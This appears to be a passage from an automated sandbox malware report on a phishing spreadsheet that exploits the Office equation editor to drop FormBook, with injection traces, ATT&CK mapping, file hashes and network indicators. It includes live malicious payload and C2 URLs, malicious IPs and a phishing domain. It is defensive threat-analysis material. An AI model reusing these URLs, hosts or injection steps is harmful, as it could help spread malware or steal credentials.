            Source: C:\Users\Public\vbc.exeCode function: 4_2_004465D8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004465E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00446608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004466A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00446978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00441E58 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeCode function: 5_2_007726F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026726F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B50 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A3B6 SetUnhandledExceptionFilter,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A3C8 SetUnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 163.197.71.43 80
            Source: C:\Windows\explorer.exeDomain query: www.mediafyagency.com
            Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
            Source: C:\Windows\explorer.exeDomain query: www.aloebiotics.com
            Source: C:\Windows\explorer.exeDomain query: www.sjljtzsls.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: CA0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Users\user\AppData\Local\Temp\Cielert.tmp target: C:\Users\Public\vbc.exe protection: readonly
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: explorer.exe, 00000006.00000000.536218845.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.547008942.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.603495543.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528059853.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A855 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0043B3F9 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1Process Injection512Masquerading111Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information4LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 552838 Sample: RFQ_Order_PO_TAE5203E.xlsx Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 15 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 21 2->15         started        process3 dnsIp4 47 209.141.37.110, 49167, 80 PONYNETUS United States 10->47 35 C:\Users\user\AppData\Local\...\hnmy[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 1 10->17         started        39 C:\Users\...\~$RFQ_Order_PO_TAE5203E.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\Cielert.tmp, PE32 17->33 dropped 57 Antivirus detection for dropped file 17->57 59 Multi AV Scanner detection for dropped file 17->59 61 Machine Learning detection for dropped file 17->61 63 3 other signatures 17->63 21 vbc.exe 17->21         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.aloebiotics.com 64.190.62.111, 49169, 80 NBS11696US United States 24->41 43 www.sjljtzsls.com 163.197.71.43, 49170, 80 CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHK South Africa 24->43 45 www.mediafyagency.com 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 msiexec.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 31 cmd.exe 28->31         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ_Order_PO_TAE5203E.xlsx36%VirustotalBrowse
            RFQ_Order_PO_TAE5203E.xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Cielert.tmp100%AviraTR/Crypt.ZPACK.Gen
            C:\Users\Public\vbc.exe100%AviraTR/Crypt.XPACK.Gen3
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe100%AviraTR/Crypt.XPACK.Gen3
            C:\Users\user\AppData\Local\Temp\Cielert.tmp100%Joe Sandbox ML
            C:\Users\Public\vbc.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe31%MetadefenderBrowse
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe60%ReversingLabsWin32.Trojan.Zusy
            C:\Users\user\AppData\Local\Temp\Cielert.tmp50%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\Cielert.tmp89%ReversingLabsWin32.Trojan.FormBook
            C:\Users\Public\vbc.exe31%MetadefenderBrowse
            C:\Users\Public\vbc.exe60%ReversingLabsWin32.Trojan.Zusy

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            4.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
            4.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
            5.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
            8.2.msiexec.exe.2b5796c.6.unpack100%AviraTR/Patched.GenDownload File
            4.1.vbc.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
            4.1.vbc.exe.2130000.1.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
            5.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://209.141.37.110/hnmy.exe13%VirustotalBrowse
            http://209.141.37.110/hnmy.exe100%Avira URL Cloudmalware
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v100%Avira URL Cloudmalware
            http://java.sun.com0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            www.dreamschools.online/b80i/100%Avira URL Cloudphishing
            http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v100%Avira URL Cloudmalware
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://sogou.9898top1.com/sscx.html0%Avira URL Cloudsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.aloebiotics.com
            		64.190.62.111
            		truetrue
              		unknown
              www.sjljtzsls.com
              		163.197.71.43
              		truetrue
                		unknown
                www.mediafyagency.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://209.141.37.110/hnmy.exetrue
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4vtrue
                  • Avira URL Cloud: malware
                  		unknown
                  www.dreamschools.online/b80i/true
                  • Avira URL Cloud: phishing
                  		low
                  http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4vtrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.windows.com/pctv.explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
                    http://investor.msn.comexplorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://treyresearch.netexplorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_lamsiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmpfalse
                            		high
                            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpfalse
                              		high
                              http://www.piriform.com/ccleanerhttp://www.pirexplorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmpfalse
                                    		high
                                    http://investor.msn.com/explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.%s.comPAexplorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpfalse
                                          		high
                                          https://support.mozilla.orgexplorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            http://sogou.9898top1.com/sscx.htmlmsiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            209.141.37.110
                                            		unknownUnited States
                                            		53667PONYNETUStrue
                                            64.190.62.111
                                            		www.aloebiotics.comUnited States
                                            		11696NBS11696UStrue
                                            163.197.71.43
                                            		www.sjljtzsls.comSouth Africa
                                            		140107CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHKtrue

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:552838
                                            Start date:13.01.2022
                                            Start time:20:07:37
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:RFQ_Order_PO_TAE5203E.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLSX@9/15@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 44.7% (good quality ratio 42%)
                                            • Quality average: 73.9%
                                            • Quality standard deviation: 30.1%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            20:08:51API Interceptor77x Sleep call for process: EQNEDT32.EXE modified
                                            20:09:15API Interceptor35x Sleep call for process: vbc.exe modified
                                            20:09:31API Interceptor208x Sleep call for process: msiexec.exe modified
                                            20:10:20API Interceptor1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:downloaded
                                            Size (bytes):598016
                                            Entropy (8bit):7.276412737461471
                                            Encrypted:false
                                            SSDEEP:12288:KrsJGHL/Sw61UEVluVwMh8YelnvoCUiNG5VNQa5VQeiXMr0cZhMsr:CsJGHLbEVlu3elnwCR8xVPiXURr
                                            MD5:A21C93294EF3770C5C728A1B2D82FB92
                                            SHA1:239E6B8D02BA3501EFDC22AE5690DCE827F3AA6B
                                            SHA-256:1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
                                            SHA-512:5621C1D39B752D5320CEE7BD265AB0C26C14791215F2A3D9F34BD870DC818DEB36DD0F46B443F95919B41544FC13C671F2C50B4C6602B15642DBF4C655C54748
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                            • Antivirus: ReversingLabs, Detection: 60%
                                            Reputation:low
                                            IE Cache URL:http://209.141.37.110/hnmy.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................................N.....%..F..%.....u.....Rich...................PE..L...t.FX.....................0......5Z............@..........................p...............................................A......................................5................................................................................text...m........................... ..`.rdata..nl.......p..................@..@.data.......`...`...`..............@....bss................................@..@.bdata..............................@...................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\136D0B4A.jpeg
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                            Category:dropped
                                            Size (bytes):4396
                                            Entropy (8bit):7.884233298494423
                                            Encrypted:false
                                            SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                            MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                            SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                            SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                            SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                            Malicious:false
                                            Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C87F836.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
